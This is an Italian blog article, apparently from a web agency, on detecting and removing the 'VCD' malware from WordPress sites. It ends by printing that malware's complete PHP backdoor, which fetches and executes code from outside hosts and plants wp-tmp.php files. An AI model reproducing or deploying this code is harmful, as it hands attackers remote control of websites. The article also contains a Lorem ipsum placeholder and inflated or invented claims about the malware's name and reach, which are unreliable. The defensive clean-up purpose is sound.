Malware VCD Wordpress - Causa e risoluzione
W ordPress è una piattaforma di blogging e CMS open source molto popolare. Un grande vantaggio di WordPress è che si basa su una comunità di sviluppatori attiva che contribuisce costantemente alla creazione di nuovi plugin, temi e moduli che potenziano le funzionalità del tuo sito web. Uno svantaggio è che purtroppo, come qualsiasi altro sistema, può essere colpito da malware.
Malware è un termine generico per descrivere un tipo di software dannoso o malevolo. Di solito, i malware sono progettati per intercettare le informazioni private di un utente, anche se possono avere molti altri obiettivi. I malware possono anche essere usati per diffondere spam, rubare dati, danneggiare i file, rubare le informazioni di accesso e, in generale, compromettere la sicurezza del sistema.
Per combattere questi attacchi, WordPress ha sviluppato un sistema di sicurezza avanzato. Per prima cosa, offre una vasta gamma di strumenti di sicurezza nel proprio back-end, come la protezione dagli attacchi bruteforce, la disattivazione dell'accesso ai file diretti e la creazione di un firewall per bloccare le connessioni sospette. Inoltre, WordPress consiglia ai suoi utenti di usare plugin di sicurezza come Sucuri e Wordfence per aiutare a prevenire gli attacchi.
Infine, è importante notare che WordPress è costantemente monitorato dalla sua comunità di sviluppatori per identificare e risolvere eventuali vulnerabilità di sicurezza.
Malware
Quali sono le ragioni più comuni che portano a contrarre un malware su un sito web WordPress?
WordPress è uno dei sistemi di gestione di contenuti più popolari per creare siti web. Si tratta di una soluzione estremamente pratica e ricca di opzioni per la creazione di siti web. Tuttavia, la sua popolarità ha anche attirato l'attenzione di hacker e criminali informatici. La maggior parte dei malware che colpiscono i siti WordPress sono causati da una mancata attenzione alla sicurezza. Quindi, se si desidera prevenire un attacco, è necessario adottare le giuste precauzioni.
Una delle principali cause di attacchi da malware ai siti WordPress è costituita da vulnerabilità di sicurezza non corrette. Wordpress è un prodotto open source, il che significa che i codici sorgenti sono disponibili per chiunque. Ciò significa anche che è possibile identificare le vulnerabilità che possono essere sfruttate da persone malintenzionate. Una volta identificate, è possibile sfruttarle per infiltrarsi in un sito web e installare malware. Per prevenire questo, è necessario essere consapevoli delle vulnerabilità presenti, nonché tenerle aggiornate.
Gli aggiornamenti di sicurezza sono un altro importante fattore da considerare. I proprietari di siti web WordPress devono essere consapevoli del fatto che gli aggiornamenti di sicurezza possono prevenire gli attacchi e fermare i criminali informatici. Gli aggiornamenti di sicurezza includono patch di sicurezza e aggiornamenti di plugin. Un’ altra causa di attacchi deriva da plugin o temi che possono contenere malware se scaricati illegalmente. Questi plugin o temi non sono stati verificati o testati per la sicurezza e possono contenere codice dannoso. È importante assicurarsi di scaricare sempre plugin o temi da fonti attendibili e di aggiornare sempre le versioni più recenti di WordPress. Se un plugin risulta danneggiato o corrotto, è possibile rimuoverlo dal proprio server per evitare che malware e codice dannoso possano compromettere l'intero sistema. Inoltre, è consigliabile installare plugin di sicurezza di terze parti sul proprio sito Web per rilevare e prevenire le minacce informatiche.
Malware
Il Malware VCD...
VCD di WordPress è un malware che ha infettato centinaia di milioni di siti web basati su WordPress in tutto il mondo. Il malware è stato scoperto nel 2017 e, purtroppo, ancora oggi molti siti web lo ospitano.
VCD di WordPress è un programma maligno che fa parte di una famiglia di malware nota come "Virus Creation Decoder". Il malware è stato progettato per infettare siti web, in particolare quelli basati su WordPress, e successivamente rubare informazioni personali come username, password, indirizzi email, numeri di carta di credito e altre informazioni sensibili. Il malware si diffonde attraverso plugin e temi vulnerabili, e può rimanere inattivo per un lungo periodo di tempo.
Una volta instauratosi, VCD di WordPress può utilizzare una serie di complesse tecniche di hacking, come l'iniezione di codice, la creazione di backdoor e l'utilizzo di bot per distribuire altri malware. Inoltre, può anche creare link con siti web che inviano spam o contengono contenuti dannosi.
Per prevenire una possibile infestazione da VCD di WordPress, è importante mantenere i propri siti web sempre aggiornati e mantenere una forte protezione di rete. È inoltre importante monitorare costantemente i log del server e l'attività dei siti web che controllano, per individuare eventuali attacchi in corso. Se il server o uno qualsiasi dei siti web viene compromesso, è importante intervenire rapidamente e rimuovere il malware.
Cartelle Infette..
Una volta che il sito è stato infettato da questo malware, quest'ultimo prende parte del controllo del vostro tema. Il cuore "pulsante" infetta direttamente il file functions.php del vostro tema di wordpress. Inoltre crea delle sub-cartelle nella cartella wp-includes.
Come accorgersi e come Eliminarlo…
Il malware VCD (Viaggiatori Cattivo Design), è una minaccia che può facilmente infettare i siti web WordPress. Può essere difficile da identificare e può portare a gravi danni al tuo sito. Fortunatamente, seguendo le giuste misure, puoi rimuovere il malware VCD da WordPress in modo efficace ed efficiente.
Passaggio 1: Verifica se il tuo sito è infetto
In primo luogo, è importante identificare se il tuo sito è stato effettivamente infettato da VCD. Ci sono alcuni indizi da cercare durante questo processo. Questi includono la visualizzazione di avvisi di sicurezza indesiderati, la presenza di link nascosti o codici malevoli nel tuo codice, o una riduzione significativa delle prestazioni del tuo sito web. Se individui qualsiasi di questi segnali, allora è probabile che il tuo sito sia stato infettato.
Passaggio 2: Verifica se ci sono alterazioni dei file
Questo malware, essendo che agisce direttamente sui nostri file, è importante recuperare gli accessi FTP e/o al pannello di controllo (es: Plesk,CPanel ecc) in modo da verificare noi stessi se qualche cartella e/o file è stato alterato. Una volta entrato nel file manager del server è opportuno ricercare la cartella : "WP-INCLUDES", se all'interno di tale cartella sono presenti i seguenti file: " wp-feed.php" , "wp-tmp.php" e " wp-vcd.php" molto probabilmente il sito è infetto. Per essere sicuri all 100% è possibile fare un'altra prova, ovvero aprire il file di configurazione del tema(Functions.php). Questo si trova nella cartella "WP-CONTENT/THEMES/NOMEDELTEMA ".
Per confermare l'effettiva violazione del malware è possibile verificare la presenza di questo codice nel vostro file functions.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Passaggio : Eliminare il Malware
- Eliminare i file (se presenti) : "wp-feed.php", "wp-tmp.php" e " wp-vcd.php" dalla cartella wp-Includes
- Aprire il file functions.php del vostro tema ed eliminare la parte infetta, normalmente si trova sempre all'inizio. Qui bisogna stare molto attenti a non cancellare del codice non malevolo. Un consiglio che ti dò è quello di eliminare dal primo <?php a ?>. Dopo il codice malevolo c'è un'altro <?php e questo NON lo devi eliminare perchè fa parte del tema. Di norma dopo il secondo <?php ci sono dei commenti che sono visibili da delle //
- Una volta rimosso verifica se ci sono aggiornamenti da eseguire
Se sei arrivato fino a qui molto probabilmente sei riuscito ad eliminare il malware dal tuo sito. Allego qui di seguito il codice completo del malware presente nel file functions. (Il codice sarà molto simile a quello che troverai, l'unica cosa che cambieranno saranno le keys.
<?php ELIMINARE
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘1f501615e985a65b627398d427c88767’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{
if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain))
{
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}
break;
case ‘change_code’;
if (isset($_REQUEST[‘newcode’]))
{
if (!empty($_REQUEST[‘newcode’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i’,$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);
@file_put_contents(__FILE__, $file);
print “true”;
}
}
}
}
break;
default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}
die(“”);
}
$div_code_name = “wp_vcd”;
$funcfile = __FILE__;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
if( fwrite($handle, “<?php\n” . $phpCode))
{
}
else
{
$tmpfname = tempnam(‘./’, “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key=’671f55202565d8b7050045e7ae0d758c’;
if (($tmpcontent = @file_get_contents(“http://www.gapilo.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.gapilo.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);
if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.pw/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);
if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.top/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);
if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?> ELIMINARE
